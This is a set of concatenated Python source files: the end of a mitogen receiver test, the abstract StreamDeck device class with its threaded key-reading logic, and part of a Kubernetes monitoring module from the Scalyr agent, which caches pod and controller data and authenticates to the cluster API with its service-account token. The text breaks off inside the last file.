wait_recv = mitogen.core.Receiver(self.router)
t = threading.Thread(target=lambda: self.wait(latch, wait_recv))
t.start()
sender = wait_recv.to_sender()
sender.close()
def throw():
raise latch.get()
t.join()
e = self.assertRaises(mitogen.core.ChannelError, throw)
self.assertEqual(e.args[0], sender.explicit_close_msg)
@unittest.skip(reason=(
        'Unclear if a single dead message received from remote should '
'cause all threads to wake up.'
))
def test_sender_closes_all_threads(self):
latch = mitogen.core.Latch()
wait_recv = mitogen.core.Receiver(self.router)
ts = [
threading.Thread(target=lambda: self.wait(latch, wait_recv))
for x in range(5)
]
for t in ts:
t.start()
sender = wait_recv.to_sender()
sender.close()
def throw():
raise latch.get()
for x in range(5):
e = self.assertRaises(mitogen.core.ChannelError, throw)
self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)
for t in ts:
t.join()
# TODO: what happens to a Select subscribed to the receiver in this case?
class ToSenderTest(testlib.RouterMixin, testlib.TestCase):
klass = mitogen.core.Receiver
def test_returned_context(self):
myself = self.router.myself()
recv = self.klass(self.router)
self.assertEqual(myself, recv.to_sender().context)
|
StreamDeck.py
|
# Python Stream Deck Library
# Released under the MIT license
#
# dean [at] fourwalledcubicle [dot] com
# www.fourwalledcubicle.com
#
import threading
import time
from abc import ABC, abstractmethod
from ..Transport.Transport import TransportError
class StreamDeck(ABC):
"""
Represents a physically attached StreamDeck device.
"""
KEY_COUNT = None
KEY_COLS = None
KEY_ROWS = None
KEY_PIXEL_WIDTH = None
KEY_PIXEL_HEIGHT = None
    KEY_IMAGE_FORMAT = None
KEY_FLIP = None
KEY_ROTATION = None
DECK_TYPE = None
def __init__(self, device):
self.device = device
self.last_key_states = [False] * self.KEY_COUNT
self.read_thread = None
self.run_read_thread = False
self.read_poll_hz = 20
self.key_callback = None
self.update_lock = threading.RLock()
def __del__(self):
"""
Delete handler for the StreamDeck, automatically closing the transport
if it is currently open and terminating the transport reader thread.
"""
try:
self._setup_reader(None)
except (TransportError, ValueError):
pass
try:
self.device.close()
except (TransportError):
pass
def __enter__(self):
"""
Enter handler for the StreamDeck, taking the exclusive update lock on
the deck. This can be used in a `with` statement to ensure that only one
thread is currently updating the deck, even if it is doing multiple
operations (e.g. setting the image on multiple keys).
"""
self.update_lock.acquire()
def __exit__(self, type, value, traceback):
"""
Exit handler for the StreamDeck, releasing the exclusive update lock on
the deck.
"""
self.update_lock.release()
@abstractmethod
def _read_key_states(self):
"""
Reads the raw key states from an attached StreamDeck.
:rtype: list(bool)
:return: List containing the raw key states.
"""
pass
@abstractmethod
def _reset_key_stream(self):
"""
Sends a blank key report to the StreamDeck, resetting the key image
streamer in the device. This prevents previously started partial key
writes that were not completed from corrupting images sent from this
application.
"""
pass
def _extract_string(self, data):
"""
Extracts out a human-readable string from a collection of raw bytes,
removing any trailing whitespace or data after the first NUL byte.
"""
return str(bytes(data), 'ascii', 'replace').partition('\0')[0].rstrip()
def _read(self):
"""
Read handler for the underlying transport, listening for button state
changes on the underlying device, caching the new states and firing off
any registered callbacks.
"""
while self.run_read_thread:
try:
new_key_states = self._read_key_states()
if new_key_states is None:
time.sleep(1.0 / self.read_poll_hz)
continue
if self.key_callback is not None:
for k, (old, new) in enumerate(zip(self.last_key_states, new_key_states)):
if old != new:
self.key_callback(self, k, new)
self.last_key_states = new_key_states
except (TransportError):
self.run_read_thread = False
def _setup_reader(self, callback):
"""
Sets up the internal transport reader thread with the given callback,
for asynchronous processing of HID events from the device. If the thread
already exists, it is terminated and restarted with the new callback
function.
:param function callback: Callback to run on the reader thread.
"""
if self.read_thread is not None:
self.run_read_thread = False
self.read_thread.join()
if callback is not None:
self.run_read_thread = True
self.read_thread = threading.Thread(target=callback)
self.read_thread.daemon = True
self.read_thread.start()
def open(self):
"""
Opens the device for input/output. This must be called prior to setting
or retrieving any device state.
.. seealso:: See :func:`~StreamDeck.close` for the corresponding close method.
"""
self.device.open()
self._reset_key_stream()
self._setup_reader(self._read)
def close(self):
"""
Closes the device for input/output.
.. seealso:: See :func:`~StreamDeck.open` for the corresponding open method.
"""
self.device.close()
def connected(self):
"""
Indicates if the physical StreamDeck device this instance is attached to
is still connected to the host.
:rtype: bool
:return: `True` if the deck is still connected, `False` otherwise.
"""
return self.device.connected()
def id(self):
"""
Retrieves the physical ID of the attached StreamDeck. This can be used
to differentiate one StreamDeck from another.
:rtype: str
:return: Identifier for the attached device.
"""
return self.device.path()
def key_count(self):
"""
Retrieves number of physical buttons on the attached StreamDeck device.
:rtype: int
:return: Number of physical buttons.
"""
return self.KEY_COUNT
def deck_type(self):
"""
Retrieves the model of Stream Deck.
:rtype: str
        :return: String containing the model name of the StreamDeck device.
"""
return self.DECK_TYPE
def key_layout(self):
"""
Retrieves the physical button layout on the attached StreamDeck device.
:rtype: (int, int)
:return (rows, columns): Number of button rows and columns.
"""
return self.KEY_ROWS, self.KEY_COLS
def key_image_format(self):
"""
Retrieves the image format accepted by the attached StreamDeck device.
Images should be given in this format when setting an image on a button.
.. seealso:: See :func:`~StreamDeck.set_key_image` method to update the
image displayed on a StreamDeck button.
:rtype: dict()
:return: Dictionary describing the various image parameters
(size, image format, image mirroring and rotation).
"""
return {
'size': (self.KEY_PIXEL_WIDTH, self.KEY_PIXEL_HEIGHT),
'format': self.KEY_IMAGE_FORMAT,
'flip': self.KEY_FLIP,
'rotation': self.KEY_ROTATION,
}
def set_poll_frequency(self, hz):
"""
Sets the frequency of the button polling reader thread, determining how
often the StreamDeck will be polled for button changes.
A higher frequency will result in a higher CPU usage, but a lower
        latency between a physical button press and an event from the library.
:param int hz: Reader thread frequency, in Hz (1-1000).
"""
self.read_poll_hz = min(max(hz, 1), 1000)
def set_key_callback(self, callback):
"""
Sets the callback function called each time a button on the StreamDeck
changes state (either pressed, or released).
.. note:: This callback will be fired from an internal reader thread.
Ensure that the given callback function is thread-safe.
.. note:: Only one callback can be registered at one time.
.. seealso:: See :func:`~StreamDeck.set_key_callback_async` method for
a version compatible with Python 3 `asyncio` asynchronous
functions.
:param function callback: Callback function to fire each time a button
state changes.
"""
self.key_callback = callback
def set_key_callback_async(self, async_callback, loop=None):
"""
Sets the asynchronous callback function called each time a button on the
StreamDeck changes state (either pressed, or released). The given
callback should be compatible with Python 3's `asyncio` routines.
.. note:: The asynchronous callback will be fired in a thread-safe
manner.
.. note:: This will override the callback (if any) set by
:func:`~StreamDeck.set_key_callback`.
:param function async_callback: Asynchronous callback function to fire
each time a button state changes.
:param asyncio.loop loop: Asyncio loop to dispatch the callback into
"""
import asyncio
loop = loop or asyncio.get_event_loop()
def callback(*args):
asyncio.run_coroutine_threadsafe(async_callback(*args), loop)
self.set_key_callback(callback)
def key_states(self):
"""
Retrieves the current states of the buttons on the StreamDeck.
:rtype: list(bool)
:return: List describing the current states of each of the buttons on
the device (`True` if the button is being pressed, `False`
otherwise).
"""
return self.last_key_states
@abstractmethod
def reset(self):
"""
Resets the StreamDeck, clearing all button images and showing the
standby image.
"""
pass
@abstractmethod
def set_brightness(self, percent):
"""
Sets the global screen brightness of the StreamDeck, across all the
physical buttons.
:param int/float percent: brightness percent, from [0-100] as an `int`,
or normalized to [0.0-1.0] as a `float`.
"""
pass
@abstractmethod
def get_serial_number(self):
"""
Gets the serial number of the attached StreamDeck.
:rtype: str
:return: String containing the serial number of the attached device.
"""
pass
@abstractmethod
def get_firmware_version(self):
"""
Gets the firmware version of the attached StreamDeck.
:rtype: str
:return: String containing the firmware version of the attached device.
"""
pass
@abstractmethod
def set_key_image(self, key, image):
"""
Sets the image of a button on the StreamDeck to the given image. The
image being set should be in the correct format for the device, as an
enumerable collection of bytes.
.. seealso:: See :func:`~StreamDeck.get_key_image_format` method for
information on the image format accepted by the device.
:param int key: Index of the button whose image is to be updated.
:param enumerable image: Raw data of the image to set on the button.
If `None`, the key will be cleared to a black
color.
"""
pass
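# Illustrative usage sketch (not part of the original module): StreamDeck is abstract,
# so `deck` below stands for a concrete device instance obtained from the library's
# device enumeration (a hypothetical placeholder here):
#
#   def on_key_change(deck, key, state):
#       print("Key {} {}".format(key, "pressed" if state else "released"))
#
#   deck.open()                           # must be called before any other device I/O
#   deck.set_brightness(50)
#   deck.set_key_callback(on_key_change)  # fired from the internal reader thread
#   ...
#   deck.close()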
|
k8s.py
|
import hashlib
import logging
import os
import random
import string
from string import Template
import scalyr_agent.monitor_utils.annotation_config as annotation_config
import scalyr_agent.third_party.requests as requests
import scalyr_agent.util as util
from scalyr_agent.util import StoppableThread
from scalyr_agent.json_lib import JsonObject
import threading
import time
import traceback
import scalyr_agent.scalyr_logging as scalyr_logging
import urllib
global_log = scalyr_logging.getLogger(__name__)
# endpoints used by the agent for querying the k8s api. Having this mapping allows
# us to avoid special casing the logic for each different object type. We can just
# look up the appropriate endpoint in this dict and query objects however we need.
#
# The dict is keyed by object kind, and for each object kind, there are 3 endpoints:
# single, list and list all.
#
# `single` is for querying a single object of a specific type
# `list` is for querying all objects of a given type in a specific namespace
# `list-all` is for querying all objects of a given type in the entire cluster
#
# the `single` and `list` endpoints are Templates that require the caller to substitute
# in the appropriate values for ${namespace} and ${name}
_OBJECT_ENDPOINTS = {
'CronJob' : {
'single' : Template( '/apis/batch/v1beta1/namespaces/${namespace}/cronjobs/${name}' ),
'list' : Template( '/apis/batch/v1beta1/namespaces/${namespace}/cronjobs' ),
'list-all' : '/apis/batch/v1beta1/cronjobs'
},
'DaemonSet' : {
'single' : Template( '/apis/apps/v1/namespaces/${namespace}/daemonsets/${name}' ),
'list' : Template( '/apis/apps/v1/namespaces/${namespace}/daemonsets' ),
'list-all' : '/apis/apps/v1/daemonsets'
},
'Deployment' : {
'single' : Template( '/apis/apps/v1/namespaces/${namespace}/deployments/${name}' ),
'list' : Template( '/apis/apps/v1/namespaces/${namespace}/deployments' ),
'list-all' : '/apis/apps/v1/deployments'
},
'Job' : {
'single' : Template( '/apis/batch/v1/namespaces/${namespace}/jobs/${name}' ),
'list' : Template( '/apis/batch/v1/namespaces/${namespace}/jobs' ),
'list-all' : '/apis/batch/v1/jobs'
},
'Pod' : {
'single' : Template( '/api/v1/namespaces/${namespace}/pods/${name}' ),
'list' : Template( '/api/v1/namespaces/${namespace}/pods' ),
'list-all' : '/api/v1/pods'
},
'ReplicaSet': {
'single' : Template( '/apis/apps/v1/namespaces/${namespace}/replicasets/${name}' ),
'list' : Template( '/apis/apps/v1/namespaces/${namespace}/replicasets' ),
'list-all' : '/apis/apps/v1/replicasets'
},
'ReplicationController': {
'single' : Template( '/api/v1/namespaces/${namespace}/replicationcontrollers/${name}' ),
'list' : Template( '/api/v1/namespaces/${namespace}/replicationcontrollers' ),
'list-all' : '/api/v1/replicationcontrollers'
},
'StatefulSet': {
'single' : Template( '/apis/apps/v1/namespaces/${namespace}/statefulsets/${name}' ),
'list' : Template( '/apis/apps/v1/namespaces/${namespace}/statefulsets' ),
'list-all' : '/apis/apps/v1/statefulsets'
},
}
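# Illustrative sketch (not part of the original module): the Template entries above are
# meant to be resolved with substitute(), e.g. the single-object endpoint for a
# hypothetical pod "my-pod" in the "default" namespace:
#
#   path = _OBJECT_ENDPOINTS['Pod']['single'].substitute(namespace='default', name='my-pod')
#   # -> '/api/v1/namespaces/default/pods/my-pod'
#
# The 'list-all' entries are plain strings and need no substitution.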
class K8sApiException( Exception ):
"""A wrapper around Exception that makes it easier to catch k8s specific
exceptions
"""
pass
class K8sApiAuthorizationException( K8sApiException ):
"""A wrapper around Exception that makes it easier to catch k8s specific
exceptions
"""
    def __init__( self, path ):
super(K8sApiAuthorizationException, self).__init__( "You don't have permission to access %s. Please ensure you have correctly configured the RBAC permissions for the scalyr-agent's service account" % path )
class KubeletApiException( Exception ):
"""A wrapper around Exception that makes it easier to catch k8s specific
exceptions
"""
pass
class PodInfo( object ):
"""
A collection class that stores label and other information about a kubernetes pod
"""
def __init__( self, name='', namespace='', uid='', node_name='', labels={}, container_names=[], annotations={}, controller=None ):
self.name = name
self.namespace = namespace
self.uid = uid
self.node_name = node_name
self.labels = labels
self.container_names = container_names
self.annotations = annotations
self.controller = controller # controller can't change for the life of the object so we don't include it in hash
# generate a hash we can use to compare whether or not
# any of the pod info has changed
md5 = hashlib.md5()
md5.update( name )
md5.update( namespace )
md5.update( uid )
md5.update( node_name )
# flatten the labels dict in to a single string because update
# expects a string arg. To avoid cases where the 'str' of labels is
# just the object id, we explicitly create a flattened string of
# key/value pairs
flattened = []
for k,v in labels.iteritems():
flattened.append( k )
flattened.append( v )
md5.update( ''.join( flattened ) )
# flatten the container names
# see previous comment for why flattening is necessary
md5.update( ''.join( container_names ) )
# flatten the annotations dict in to a single string
# see previous comment for why flattening is necessary
flattened = []
for k,v in annotations.iteritems():
flattened.append( k )
flattened.append( str(v) )
md5.update( ''.join( flattened ) )
self.digest = md5.digest()
def exclude_pod( self, container_name=None, default=False ):
"""
Returns whether or not this pod should be excluded based
on include/exclude annotations. If an annotation 'exclude' exists
then this will be returned. If an annotation 'include' exists, then
the boolean opposite of 'include' will be returned. 'include' will
always override 'exclude' if it exists.
param: container_name - if specified, and container_name exists in
the pod annotations, then the container specific annotations will
        also be checked. These will supersede the pod level include/exclude
annotations
param: default - Boolean the default value if no annotations are found
return Boolean - whether or not to exclude this pod
"""
def exclude_status( annotations, default ):
exclude = util.value_to_bool( annotations.get('exclude', default) )
# include will always override value of exclude if both exist
exclude = not util.value_to_bool( annotations.get('include', not exclude) )
return exclude
result = exclude_status( self.annotations, default )
if container_name and container_name in self.annotations:
result = exclude_status( self.annotations[container_name], result )
return result
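# A minimal sketch (not part of the original module) of the include/exclude
# annotation semantics documented in exclude_pod(): a container-level annotation
# dict overrides the pod-level setting, and 'include' wins over 'exclude'.
# Assumes util.value_to_bool() accepts 'true'/'false' strings; all values are examples.
def _example_exclude_pod():
    pod = PodInfo( name='example-pod', namespace='default',
                   annotations={ 'exclude': 'true',
                                 'my-container': { 'include': 'true' } } )
    assert pod.exclude_pod()                                        # excluded at the pod level
    assert not pod.exclude_pod( container_name='my-container' )     # container-level include overrides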
class Controller( object ):
"""
General class for all cached Controller objects
"""
def __init__( self, name='', namespace='', kind='', parent_name=None, parent_kind=None, labels={} ):
self.name = name
self.namespace = namespace
self.kind = kind
self.access_time = None
self.parent_name = parent_name
self.parent_kind = parent_kind
flat_labels = []
for key, value in labels.iteritems():
flat_labels.append( "%s=%s" % (key, value) )
self.flat_labels = ','.join( flat_labels )
class _K8sCache( object ):
"""
A cached store of objects from a k8s api query
This is a private class to this module. See KubernetesCache which instantiates
instances of _K8sCache for querying different k8s API objects.
This abstraction is thread-safe-ish, assuming objects returned
from querying the cache are never written to.
"""
def __init__( self, logger, k8s, processor, object_type, filter=None, perform_full_updates=True ):
"""
        Initialises a Kubernetes cache
@param: logger - a Scalyr logger
@param: k8s - a KubernetesApi object
@param: processor - a _K8sProcessor object for querying/processing the k8s api
@param: object_type - a string containing a textual name of the objects being cached, for use in log messages
@param: filter - a k8s filter string or none if no filtering is to be done
@param: perform_full_updates - Boolean. If False no attempts will be made to fully update the cache (only single items will be cached)
"""
# protects self.objects
self._lock = threading.Lock()
# dict of object dicts. The outer dict is hashed by namespace,
# and the inner dict is hashed by object name
self._objects = {}
self._logger = logger
self._k8s = k8s
self._processor = processor
self._object_type = object_type
self._filter = filter
self._perform_full_updates=perform_full_updates
def shallow_copy(self):
"""Returns a shallow copy of all the cached objects dict"""
result = {}
self._lock.acquire()
try:
for k, v in self._objects.iteritems():
result[k] = v
finally:
self._lock.release()
return result
def purge_expired( self, access_time ):
"""
        removes any items from the store that haven't been accessed since `access_time`
"""
self._lock.acquire()
stale = []
try:
for namespace, objs in self._objects.iteritems():
for obj_name, obj in objs.iteritems():
if hasattr( obj, 'access_time' ):
                        if obj.access_time is None or obj.access_time < access_time:
stale.append( (namespace, obj_name) )
for (namespace, obj_name) in stale:
global_log.log( scalyr_logging.DEBUG_LEVEL_1, "Removing object %s/%s from cache" % (namespace, obj_name) )
self._objects[namespace].pop( obj_name, None )
finally:
self._lock.release()
def update( self, kind ):
""" do a full update of all information from the API
"""
if not self._perform_full_updates:
return
objects = {}
try:
self._logger.log(scalyr_logging.DEBUG_LEVEL_1, 'Attempting to update k8s %s data from API' % kind )
query_result = self._k8s.query_objects( kind, filter=self._filter)
objects = self._process_objects( kind, query_result )
except K8sApiException, e:
global_log.warn( "Error accessing the k8s API: %s" % (str( e ) ),
limit_once_per_x_secs=300, limit_key='k8s_cache_update' )
# early return because we don't want to update our cache with bad data
return
except Exception, e:
self._logger.warning( "Exception occurred when updating k8s %s cache. Cache was not updated %s\n%s" % (kind, str( e ), traceback.format_exc()) )
# early return because we don't want to update our cache with bad data
return
self._lock.acquire()
try:
self._objects = objects
finally:
self._lock.release()
def _update_object( self, kind, namespace, name, current_time ):
""" update a single object, returns the object if found, otherwise return None """
result = None
try:
# query k8s api and process objects
obj = self._k8s.query_object( kind, namespace, name )
result = self._processor.process_object( obj )
except K8sApiException, e:
            # Don't do anything here. This means the object we are querying doesn't exist
# and it's up to the caller to handle this by detecting a None result
pass
# update our cache if we have a result
if result:
self._logger.log( scalyr_logging.DEBUG_LEVEL_2, "Processing single %s: %s/%s" % (self._object_type, result.namespace, result.name) )
self._lock.acquire()
try:
if result.namespace not in self._objects:
self._objects[result.namespace] = {}
current = self._objects[result.namespace]
current[result.name] = result
finally:
self._lock.release()
return result
def _process_objects( self, kind, objects ):
"""
Processes the dict returned from querying the objects and calls the _K8sProcessor to create relevant objects for caching,
@param kind: The kind of the objects
        @param objects: The JSON object returned as a response from querying all objects. This JSON object should contain an
element called 'items', which is an array of dicts
@return: a dict keyed by namespace, whose values are a dict of objects inside that namespace, keyed by objects name
"""
# get all objects
items = objects.get( 'items', [] )
# iterate over all objects, getting Info objects and storing them in the result
# dict, hashed by namespace and object name
result = {}
for obj in items:
info = self._processor.process_object( obj )
self._logger.log( scalyr_logging.DEBUG_LEVEL_1, "Processing %s: %s:%s" % (kind, info.namespace, info.name) )
if info.namespace not in result:
result[info.namespace] = {}
current = result[info.namespace]
if info.name in current:
self._logger.warning( "Duplicate %s '%s' found in namespace '%s', overwriting previous values" % (kind, info.name, info.namespace),
limit_once_per_x_secs=300, limit_key='duplicate-%s-%s' % (kind, info.uid) )
current[info.name] = info
return result
def _lookup_object( self, namespace, name, current_time ):
""" Look to see if the object specified by the namespace and name
exists within the cached data.
Return the object info, or None if not found
"""
result = None
self._lock.acquire()
try:
objects = self._objects.get( namespace, {} )
result = objects.get( name, None )
# update access time
if result is not None:
result.access_time = current_time
finally:
self._lock.release()
return result
def lookup( self, namespace, name, kind=None, current_time=None ):
""" returns info for the object specified by namespace and name
or None if no object is found in the cache.
Querying the information is thread-safe, but the returned object should
not be written to.
"""
if kind is None:
kind = self._object_type
# see if the object exists in the cache and return it if so
result = self._lookup_object( namespace, name, current_time )
if result:
self._logger.log( scalyr_logging.DEBUG_LEVEL_2, "cache hit for %s %s/%s" % (kind, namespace, name) )
return result
# we have a cache miss so query the object individually
self._logger.log( scalyr_logging.DEBUG_LEVEL_2, "cache miss for %s %s/%s" % (kind, namespace, name) )
result = self._update_object( kind, namespace, name, current_time )
return result
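# A minimal sketch (not part of the original module) of how _K8sCache is driven:
# it needs a KubernetesApi instance and a processor (both defined further below).
# In the real agent this wiring happens inside KubernetesCache; the controllers
# cache is simplified away here and the namespace/pod names are examples.
def _example_k8s_cache_lookup( logger, k8s, controllers_cache ):
    pods = _K8sCache( logger, k8s, PodProcessor( logger, controllers_cache ), 'Pod' )
    # a cache miss triggers a single-object query such as
    # /api/v1/namespaces/default/pods/my-pod; later lookups are served from memory
    return pods.lookup( 'default', 'my-pod', current_time=time.time() )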
class _K8sProcessor( object ):
"""
An abstract interface used by _K8sCache for querying a specific type of
object from the k8s api, and generating python objects from the queried result JSON.
"""
def __init__( self, logger ):
"""
@param: logger - a Scalyr logger object for logging
"""
self._logger = logger
def _get_managing_controller( self, items ):
"""
Processes a list of items, searching to see if one of them
is a 'managing controller', which is determined by the 'controller' field
@param: items - an array containing 'ownerReferences' metadata for an object
returned from the k8s api
        @return: The ownerReference dict of the managing controller, or None if no such controller exists
"""
for i in items:
controller = i.get( 'controller', False )
if controller:
return i
return None
def process_object( self, obj ):
"""
        Creates a python object based on a dict
        @param obj: A JSON dict returned as a response to querying
        the k8s API for a specific object type.
        @return a python object relevant to the processor's object type
"""
pass
class PodProcessor( _K8sProcessor ):
def __init__( self, logger, controllers ):
super( PodProcessor, self).__init__( logger )
self._controllers = controllers
def _get_controller_from_owners( self, owners, namespace ):
"""
Processes a list of owner references returned from a Pod's metadata to see
if it is eventually owned by a Controller, and if so, returns the Controller object
@return Controller - a Controller object
"""
controller = None
# check if we are owned by another controller
owner = self._get_managing_controller( owners )
if owner is None:
return None
# make sure owner has a name field and a kind field
name = owner.get( 'name', None )
if name is None:
return None
kind = owner.get( 'kind', None )
if kind is None:
return None
# walk the parent until we get to the root controller
# Note: Parent controllers will always be in the same namespace as the child
controller = self._controllers.lookup( namespace, name, kind=kind )
while controller:
if controller.parent_name is None:
self._logger.log(scalyr_logging.DEBUG_LEVEL_1, 'controller %s has no parent name' % controller.name )
break
if controller.parent_kind is None:
self._logger.log(scalyr_logging.DEBUG_LEVEL_1, 'controller %s has no parent kind' % controller.name )
break
# get the parent controller
parent_controller = self._controllers.lookup( namespace, controller.parent_name, kind=controller.parent_kind )
# if the parent controller doesn't exist, assume the current controller
# is the root controller
if parent_controller is None:
break
# walk up the chain
controller = parent_controller
return controller
def process_object( self, obj ):
""" Generate a PodInfo object from a JSON object
        @param obj: The JSON object returned as a response to querying
a specific pod from the k8s API
@return A PodInfo object
"""
result = {}
metadata = obj.get( 'metadata', {} )
spec = obj.get( 'spec', {} )
labels = metadata.get( 'labels', {} )
annotations = metadata.get( 'annotations', {} )
owners = metadata.get( 'ownerReferences', [] )
pod_name = metadata.get( "name", '' )
namespace = metadata.get( "namespace", '' )
controller = self._get_controller_from_owners( owners, namespace )
container_names = []
for container in spec.get( 'containers', [] ):
container_names.append( container.get( 'name', 'invalid-container-name' ) )
try:
annotations = annotation_config.process_annotations( annotations )
except BadAnnotationConfig, e:
self._logger.warning( "Bad Annotation config for %s/%s. All annotations ignored. %s" % (namespace, pod_name, str( e )),
limit_once_per_x_secs=300, limit_key='bad-annotation-config-%s' % info.uid )
annotations = JsonObject()
self._logger.log( scalyr_logging.DEBUG_LEVEL_2, "Annotations: %s" % ( str( annotations ) ) )
# create the PodInfo
result = PodInfo( name=pod_name,
namespace=namespace,
uid=metadata.get( "uid", '' ),
node_name=spec.get( "nodeName", '' ),
labels=labels,
container_names=container_names,
annotations=annotations,
controller=controller)
return result
class ControllerProcessor( _K8sProcessor ):
def __init__( self, logger ):
super( ControllerProcessor, self).__init__( logger )
def process_object( self, obj ):
""" Generate a Controller object from a JSON object
@param obj: The JSON object returned as a response to querying
a specific controller from the k8s API
@return A Controller object
"""
metadata = obj.get( 'metadata', {} )
kind = obj.get( "kind", '' )
owners = metadata.get( 'ownerReferences', [] )
namespace = metadata.get( "namespace", '' )
name = metadata.get( "name", '' )
labels = metadata.get( 'labels', {} )
parent_name = None
parent_kind = None
parent = self._get_managing_controller( owners )
if parent is not None:
parent_name = parent.get( 'name', None )
parent_kind = parent.get( 'kind', None )
return Controller( name, namespace, kind, parent_name, parent_kind, labels )
class KubernetesCache( object ):
def __init__( self, k8s, logger, cache_expiry_secs=30, cache_purge_secs=300, namespaces_to_ignore=None ):
self._k8s = k8s
self._namespace_filter = self._build_namespace_filter( namespaces_to_ignore )
self._node_filter = self._build_node_filter( self._namespace_filter )
# create the controller cache
self._controller_processor = ControllerProcessor( logger )
self._controllers = _K8sCache( logger, k8s, self._controller_processor, '<controller>',
filter=self._namespace_filter,
perform_full_updates=False )
# create the pod cache
self._pod_processor = PodProcessor( logger, self._controllers )
self._pods = _K8sCache( logger, k8s, self._pod_processor, 'Pod',
filter=self._node_filter )
self._cluster_name = None
self._cache_expiry_secs = cache_expiry_secs
self._cache_purge_secs = cache_purge_secs
self._last_full_update = time.time() - cache_expiry_secs - 1
self._lock = threading.Lock()
self._initialized = False
self._thread = StoppableThread( target=self.update_cache, name="K8S Cache" )
self._thread.start()
def stop(self):
"""Stops the cache, specifically stopping the background thread that refreshes the cache"""
self._thread.stop()
def is_initialized( self ):
"""Returns whether or not the k8s cache has been initialized with the full pod list"""
result = False
self._lock.acquire()
try:
result = self._initialized
finally:
self._lock.release()
return result
def _update_cluster_name( self ):
"""Updates the cluster name"""
cluster_name = self._k8s.get_cluster_name()
self._lock.acquire()
try:
self._cluster_name = cluster_name
finally:
self._lock.release()
def update_cache( self, run_state ):
"""
Main thread for updating the k8s cache
"""
start_time = time.time()
while run_state.is_running() and not self.is_initialized():
try:
# we only pre warm the pod cache and the cluster name
# controllers are cached on an as needed basis
self._pods.update( 'Pod' )
self._update_cluster_name()
self._lock.acquire()
try:
self._initialized = True
finally:
self._lock.release()
except K8sApiException, e:
global_log.warn( "Exception occurred when initializing k8s cache - %s" % (str( e ) ),
limit_once_per_x_secs=300, limit_key='k8s_api_init_cache' )
except Exception, e:
global_log.warn( "Exception occurred when initializing k8s cache - %s\n%s" % (str( e ), traceback.format_exc()) )
current_time = time.time()
elapsed = current_time - start_time
global_log.info( "Kubernetes cache initialized in %.2f seconds" % elapsed )
# go back to sleep if we haven't taken longer than the expiry time
if elapsed < self._cache_expiry_secs:
global_log.log( scalyr_logging.DEBUG_LEVEL_1, "sleeping for %.2f seconds" % (self._cache_expiry_secs - elapsed) )
run_state.sleep_but_awaken_if_stopped( self._cache_expiry_secs - elapsed )
# start the main update loop
last_purge = time.time()
while run_state.is_running():
try:
current_time = time.time()
self._pods.update( 'Pod' )
self._update_cluster_name()
if last_purge + self._cache_purge_secs < current_time:
global_log.log( scalyr_logging.DEBUG_LEVEL_1, "Purging unused controllers" )
self._controllers.purge_expired( last_purge )
last_purge = current_time
except K8sApiException, e:
global_log.warn( "Exception occurred when updating k8s cache - %s" % (str( e ) ),
limit_once_per_x_secs=300, limit_key='k8s_api_update_cache' )
except Exception, e:
global_log.warn( "Exception occurred when updating k8s cache - %s\n%s" % (str( e ), traceback.format_exc()) )
run_state.sleep_but_awaken_if_stopped( self._cache_expiry_secs )
def _build_namespace_filter( self, namespaces_to_ignore ):
"""Builds a field selector to ignore the namespaces in `namespaces_to_ignore`"""
result = ''
if namespaces_to_ignore:
for n in namespaces_to_ignore:
result += 'metadata.namespace!=%s,' % n
result = result[:-1]
return result
def _build_node_filter( self, namespace_filter ):
"""Builds a fieldSelector filter to be used when querying pods the k8s api, limiting them to the current node"""
result = None
pod_name = '<unknown>'
try:
pod_name = self._k8s.get_pod_name()
node_name = self._k8s.get_node_name( pod_name )
if node_name:
result = 'spec.nodeName=%s' % node_name
else:
global_log.warning( "Unable to get node name for pod '%s'. This will have negative performance implications for clusters with a large number of pods. Please consider setting the environment variable SCALYR_K8S_NODE_NAME to valueFrom:fieldRef:fieldPath:spec.nodeName in your yaml file" )
except K8sApiException, e:
global_log.warn( "Failed to build k8s filter -- %s" % (str( e ) ) )
except Exception, e:
global_log.warn( "Failed to build k8s filter - %s\n%s" % (str(e), traceback.format_exc() ))
if result is not None and namespace_filter:
result += ",%s" % namespace_filter
global_log.log( scalyr_logging.DEBUG_LEVEL_1, "k8s node filter for pod '%s' is '%s'" % (pod_name, result) )
return result
def pod( self, namespace, name, current_time=None ):
""" returns pod info for the pod specified by namespace and name
        or None if no pod matches.
Querying the pod information is thread-safe, but the returned object should
not be written to.
"""
return self._pods.lookup( namespace, name, kind='Pod', current_time=current_time )
def controller( self, namespace, name, kind, current_time=None ):
""" returns controller info for the controller specified by namespace and name
or None if no controller matches.
Querying the controller information is thread-safe, but the returned object should
not be written to.
"""
return self._controllers.lookup( namespace, name, kind=kind, current_time=current_time )
def pods_shallow_copy(self):
"""Retuns a shallow copy of the pod objects"""
return self._pods.shallow_copy()
def get_cluster_name( self ):
"""Returns the cluster name"""
result = None
self._lock.acquire()
try:
result = self._cluster_name
finally:
self._lock.release()
return result
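# A minimal sketch (not part of the original module) of typical KubernetesCache
# usage with the KubernetesApi wrapper defined below. This only works when running
# inside a cluster with a service-account token mounted; names are examples.
def _example_kubernetes_cache_usage( logger ):
    k8s = KubernetesApi()
    cache = KubernetesCache( k8s, logger, cache_expiry_secs=30 )
    # the background thread pre-warms the pod cache; wait for the first full update
    while not cache.is_initialized():
        time.sleep( 0.1 )
    pod = cache.pod( 'default', 'my-pod' )
    cache.stop()
    return pod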
class KubernetesApi( object ):
"""Simple wrapper class for querying the k8s api
"""
def __init__( self, ca_file='/run/secrets/kubernetes.io/serviceaccount/ca.crt',
k8s_api_url="https://kubernetes.default"):
"""Init the kubernetes object
"""
# fixed well known location for authentication token required to
# query the API
token_file="/var/run/secrets/kubernetes.io/serviceaccount/token"
# fixed well known location for namespace file
namespace_file="/var/run/secrets/kubernetes.io/serviceaccount/namespace"
self._http_host = k8s_api_url
global_log.log( scalyr_logging.DEBUG_LEVEL_1, "Kubernetes API host: %s", self._http_host )
self._timeout = 10.0
self._session = None
self._ca_file = ca_file
# We create a few headers ahead of time so that we don't have to recreate them each time we need them.
self._standard_headers = {
'Connection': 'Keep-Alive',
'Accept': 'application/json',
}
# The k8s API requires us to pass in an authentication token
# which we can obtain from a token file in a 'well known' location
token = ''
try:
# using with is ok here, because we need to be running
# a recent version of python for various 3rd party libs
with open( token_file, 'r' ) as f:
token = f.read()
except IOError, e:
pass
#get the namespace this pod is running on
self.namespace = 'default'
try:
# using with is ok here, because we need to be running
# a recent version of python for various 3rd party libs
with open( namespace_file, 'r' ) as f:
self.namespace = f.read()
except IOError, e:
pass
self._standard_headers["Authorization"] = "Bearer %s" % (token)
def _verify_connection( self ):
